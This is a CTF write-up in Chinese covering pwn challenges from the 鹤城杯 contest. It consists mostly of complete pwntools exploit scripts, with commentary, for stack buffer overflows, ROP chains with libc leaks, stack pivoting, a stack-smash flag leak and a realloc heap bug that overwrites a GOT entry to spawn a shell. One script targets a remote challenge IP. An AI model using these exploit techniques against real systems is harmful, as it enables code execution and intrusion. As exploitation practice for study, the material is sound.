鹤城杯复现

babyof

思路如下,简单题

from pwn import *

# Exploit for "babyof" (64-bit; the absolute 0x400xxx addresses imply a
# non-PIE build). Payloads are built as str + p64(...), which only works
# with a Python 2 pwntools where p64 returns str -- under Python 3 this
# raises TypeError (the onecho scripts further down use b"..." instead).
#p = process("./babyof")
p = remote("182.116.62.85",29394)
#gdb.attach(p)
elf = ELF("./babyof")
# The libc below must match the one on the target: both libc.sym["puts"]
# and the hard-coded offset used for `og` are specific to this build.
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
# Presumably a "pop rdi; ret" gadget (variable name only; taken from the
# binary by the author, not verifiable here).
rdi = 0x0000000000400743
# Stage 1: 0x48 filler bytes, then a chain that calls puts(puts@got) to
# print puts' runtime address and afterwards returns to 0x40066B --
# presumably back into the vulnerable function so that a second overflow
# is possible (confirm in the binary).
payload = "a"*0x48 + p64(rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(0x40066B)
p.sendlineafter("Do you know how to do buffer overflow?",payload)
p.recvuntil("I hope you win\n")
# puts emits the 6 significant bytes of the little-endian pointer; pad to
# 8, unpack, and subtract puts' offset in this libc to get the base.
libc_base = u64(p.recv(6).ljust(8,"\x00")) - libc.sym["puts"]
log.info("libc_base: " + hex(libc_base))

# A libc offset that is returned to directly; the trailing comment lists
# the alternative offsets the author tried. Valid only for the libc above.
og = 0x4f3c2 + libc_base#0x4f365 0x4f3c2 0x10a45c
# Stage 2: same overflow, return address replaced with that libc address.
# (A stack canary or PIE build would break this two-stage pattern: the
# first because the overwrite is detected, the second because the chain
# relies on fixed binary addresses.)
payload = "a"*0x48 + p64(og)
p.sendlineafter("Do you know how to do buffer overflow?",payload)
p.interactive()

littleof

思路和前面差不多

easyecho

没什么stack smash

from pwn import *

# Exploit for "easyecho" (PIE: every address is rebuilt from a leak).
# Same str + p64() concatenation as babyof -- Python 2 pwntools only.
p = process("./pwn")

# Leak: a 0x10-byte name without a terminator is echoed back, and the 6
# bytes that follow the echoed "a"*0x10 are read as a program pointer (so
# the echo apparently prints past the name buffer -- confirm against the
# binary). 0xcf0 is the author's offset of that pointer from the PIE base.
p.recvuntil("Name:")
p.sendline("a"*0x10)
p.recvuntil("a"*0x10)
pie = u64(p.recv(6).ljust(8,"\x00")) - 0xcf0
# Rebased addresses: a code location the author labelled "fail", and a
# data-segment location (0x202040) they expect the flag to be stored at.
fail = 0x000000000000EBD + pie
flag_ad = 0x202040 + pie
log.info("ad: " + hex(pie))  # logs the PIE base (label says "ad")
# "backdoor" is sent as an ordinary input first; what it enables is not
# visible from this script.
payload = "backdoor"
p.sendlineafter("Input:",payload)
#gdb.attach(p)
# Overflow: 0x88 filler bytes, the "fail" address once, then flag_ad
# repeated 500 times. The repetition is presumably so that the pointer
# printed by the stack-protector failure path (the "stack smash" the
# writeup refers to) ends up pointing at the flag -- confirm in the binary.
payload = "a"*0x88 + p64(fail) + p64(flag_ad)*500
p.sendlineafter("Input:",payload)

# "exitexit" presumably ends the input loop so the overflowed frame is
# left (confirm in the binary).
p.sendlineafter("Input:","exitexit")
p.interactive()

onecho

两种做法
1.跳主函数orw
2.栈迁移

解法1

这个题有点奇怪,必须要先p32(p1) + p32(1) * 4(替换成p32(ebx) + p32(bss)就第一次可以)

from pwn import *

#context.log_level = "debug"

# Exploit for "onecho" (32-bit), approach 1 from the writeup: return to
# main after every libc call and chain open/read/write. The binary is run
# under a specific glibc 2.31 loader/libc pair so the symbol offsets
# resolved from `libc` below match the process.
libc_path = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so"
ld = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/ld-2.31.so"

p = process([ld,"./onecho"],env = {"LD_PRELOAD":libc_path})

libc = ELF("/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so")
p.recvuntil("Input your name:")
# Fixed (non-PIE) addresses from the binary: puts, puts' GOT slot, main and
# the start of .bss, used as scratch space. The gadget comments are the
# author's; only p1 is used below (p2, p3 and ebx are unused here).
puts_ad = 0x08049180
puts_got = 0x0804BFC8
main_ad = 0x0804973F
bss = 0x804c000
p1 = 0x08049810#pop ebx ; pop esi ; pop edi ; pop ebp ; ret
p2 = 0x08049812#pop edi ; pop ebp ; ret
p3 = 0x08049811#pop esi ; pop edi ; pop ebp ; ret
ebx = 0x08049022#pop ebx ; ret

# Every stage has the same shape: 0x110 filler bytes (0x100 + 0x10 here,
# written as a single 0x110 below), then p1 with four dummy values -- the
# writeup says this prefix was needed for the first call to work -- then
# <function> <return-to-main> <args...>.
# Stage 1: puts(puts_got) to leak puts' runtime address, then back to main.
payload = b"a" * 0x100 + b"a" * 0x10 + p32(p1) + p32(1)*4 + p32(puts_ad) + p32(main_ad)
payload += p32(puts_got)
p.sendline(payload)

# The leaked pointer is assumed to end in byte 0xf7 (high byte of the libc
# mapping); the 4 bytes ending there are unpacked as the address.
libc_base = u32(p.recvuntil("\xf7")[-4:]) - libc.sym["puts"]
op = libc_base + libc.sym["open"]
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
malloc_hook = libc_base + libc.sym["__malloc_hook"]
log.info("libc_base: " + hex(libc_base))
log.info("malloc_hook: " + hex(malloc_hook))
free_hook = libc_base + libc.sym['__free_hook']  # computed but never used below
p.recvuntil("Input your name:")
# Stage 2: read(0, __malloc_hook, 0x10). The hook's writable memory is only
# used as storage for the file name sent on the next line; only 4 bytes
# and no terminator are sent, so the name relies on the following bytes
# being zero.
payload = b"a"*0x110 + p32(p1) + p32(1)*4 + p32(read) + p32(main_ad)
payload += p32(0) + p32(malloc_hook) + p32(0x10)
p.sendline(payload)
p.send("flag")

p.recvuntil("Input your name:\n")
# Stage 3: open(malloc_hook), i.e. open the name stored above; the next
# stage assumes the returned descriptor is 3.
payload = b"a"*0x110 + p32(p1) + p32(0x1)*4 + p32(op) + p32(main_ad)
payload += p32(malloc_hook)
p.sendline(payload)

p.recvuntil("Input your name:\n")
# Stage 4: read(3, bss + 0x110, 0x30) -- file contents into .bss.
payload = b"a"*0x110 + p32(p1) + p32(0x1)*4 + p32(read) + p32(main_ad)
payload += p32(3) + p32(bss + 0x110) + p32(0x30)
p.sendline(payload)

p.recvuntil("Input your name:\n")
# Stage 5: write(1, bss + 0x110, 0x30) -- print them.
payload = b"a"*0x110 + p32(p1) + p32(0x1)*4 + p32(write) + p32(main_ad)
payload += p32(1) + p32(bss + 0x110) + p32(0x30)
p.sendline(payload)

p.interactive()

解法2

from pwn import *

#context.log_level = "debug"

# Exploit for "onecho", approach 2 from the writeup: one overflow that
# leaks libc, reads a second chain into .bss and pivots the stack there.
libc_path = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so"
ld = "/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/ld-2.31.so"

p = process([ld,"./onecho"],env = {"LD_PRELOAD":libc_path})
elf = ELF("./onecho")
libc = ELF("/home/archer/glibc-all-in-one/libs/2.31-0ubuntu9.2_i386/libc-2.31.so")

bss = 0x804c000
# NOTE: `ebp` holds the same value as `bss` although its comment names a
# gadget; it is not used below, nor is p3. Gadget comments are the author's.
ebp = 0x804c000# pop ebp ; ret
le = 0x080492a5# leave ; ret
p1 = 0x08049810# pop ebx ; pop esi ; pop edi ; pop ebp ; ret
p2 = 0x08049022# pop ebx ; ret
p3 = 0x08049812# pop edi ; pop ebp ; ret
p4 = 0x08049811# pop esi ; pop edi ; pop ebp ; ret

# Stage 1 (the single overflow): 0x110 filler, p1 + four dummies, then
#   puts(puts@got), returning into p2 which discards the argument  -> leak
#   read(0, bss+0x500, 0x100)                                      -> stage 2 into .bss
#   p1 pops the three read args and bss+0x500 into ebp, then
#   leave; ret  -> esp becomes bss+0x500 and execution continues from the
#                  buffer just read (going by the author's gadget comments;
#                  the final p32(bss+0x500) is then never consumed).
payload = b"a"*0x110 + p32(p1) + p32(1)*4
payload += p32(elf.plt["puts"]) + p32(p2) + p32(elf.got["puts"])
payload += p32(elf.plt["read"]) + p32(p1) + p32(0) + p32(bss + 0x500) + p32(0x100)
payload += p32(bss + 0x500) + p32(le) + p32(bss+0x500)
p.sendlineafter("Input your name:\n",payload)
# Leaked pointer is assumed to end in byte 0xf7; unpack the 4 bytes ending there.
libc_base = u32(p.recvuntil("\xf7")[-4:]) - libc.sym["puts"]
op = libc_base + libc.sym["open"]
log.info("libc_base: " + hex(libc_base))
rax = 0x0002c2d2+libc_base  # unused below

# Stage 2, executed at bss+0x500. The leading dword is eaten by the
# "pop ebp" of leave;ret, then:
#   open(flag_ad)             flag_ad = bss+0x500+0x30, which is exactly where
#                             the trailing b"flag\x00" lands (12 dwords * 4 = 0x30)
#   read(3, bss+0x300, 0x30)  p4 pops the three arguments; fd 3 is assumed
#   puts(bss+0x300)           prints the data; the p32(0) after puts@plt is
#                             its (never used) return address
flag_ad = bss + 0x500 + 0x30
payload = p32(0) + p32(op) + p32(p2) + p32(flag_ad)
payload += p32(elf.plt["read"]) + p32(p4)
payload += p32(3) + p32(bss+0x300) + p32(0x30)
payload += p32(elf.plt["puts"]) + p32(0) + p32(bss+0x300) + b"flag\x00"

p.send(payload)
p.interactive()

supremarket

edit函数中有个realloc那里存在漏洞,发现了就能出

from pwn import *

# Exploit for "supremarket" (32-bit), run locally only.
p = process("./pwn")

#context.log_level = "debug"
# The atoi/system offsets below are read from this libc, so it must be the
# one the target process actually loads.
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
def add(name,price,size,des):
    """Menu option 1: create an item with the given name, price, description size and text.

    Each prompt of the target's menu is awaited and answered in order;
    numeric fields are sent as their decimal string form.
    """
    exchange = (
        ("your choice>> ", "1"),
        ("name:", name),
        ("price:", str(price)),
        ("descrip_size:", str(size)),
        ("description:", des),
    )
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)

def free(name):
    """Menu option 2: delete the item called *name*."""
    for prompt, reply in (("your choice>> ", "2"), ("name:", name)):
        p.recvuntil(prompt)
        p.sendline(reply)

def show():
    """Menu option 3: list all items; the listing is left in the tube for the caller to parse."""
    p.sendlineafter("your choice>> ", "3")

def cd(name,price):
    """Menu option 4: cut or raise the price of *name* by *price* (sent as a decimal string)."""
    p.sendlineafter("your choice>> ", "4")
    p.sendlineafter("name:", name)
    p.sendlineafter("input the value you want to cut or rise in:", str(price))

def dc(name,size,des):
    """Menu option 5 (the edit function the writeup refers to): resize the
    description of *name* to *size* bytes and write *des* into it."""
    p.sendlineafter("your choice>> ", "5")
    p.sendlineafter("name:", name)
    p.sendlineafter("descrip_size:", str(size))
    p.sendlineafter("description:", des)

# Heap setup: two items, then "a"'s description is resized to 0xb0 (the
# realloc path in the edit function that the writeup names as the bug), a
# third item is added, and "a" is edited again with crafted content. The
# crafted bytes look like a fake item record -- name "bbbb", three zero
# words, 0x14, 0x10, a pointer into the binary (0x0804B048) and 0x21 -- so
# that show() prints whatever that pointer refers to. Given the
# subtraction below it is presumably atoi's GOT entry; confirm in the
# binary. (A full-RELRO build would make that slot read-only, and size
# validation in the edit path would block the overlap in the first place.)
add("a",20,0x80,"a")
add("b",20,0x20,"b")
dc("a",0xb0,"\x00")
add("c",20,0x10,"qqqq")
dc("a",0x50,"b"*4 + p32(0)*3 + p32(0x14) + p32(0x10) + p32(0x0804B048) + p32(0x21))
show()
# Skip three lines of listing, then the 4 bytes after "des." are taken as
# the little-endian address of atoi; subtracting its offset gives the base.
p.recvline()
p.recvline()
p.recvline()
p.recvuntil("des.")
ad = u32(p.recv(4)) - libc.sym["atoi"]
log.info("libc_base: " + hex(ad))
sys_ad = ad + libc.sym["system"]
log.info("atoi: " + hex(ad + libc.sym["atoi"]))

# Editing the fake record "bbbb" writes system's address through the same
# pointer; the next menu input is then handed to system rather than atoi.
dc("bbbb",0x10,p32(sys_ad))
p.sendline("/bin/sh\x00")
p.interactive()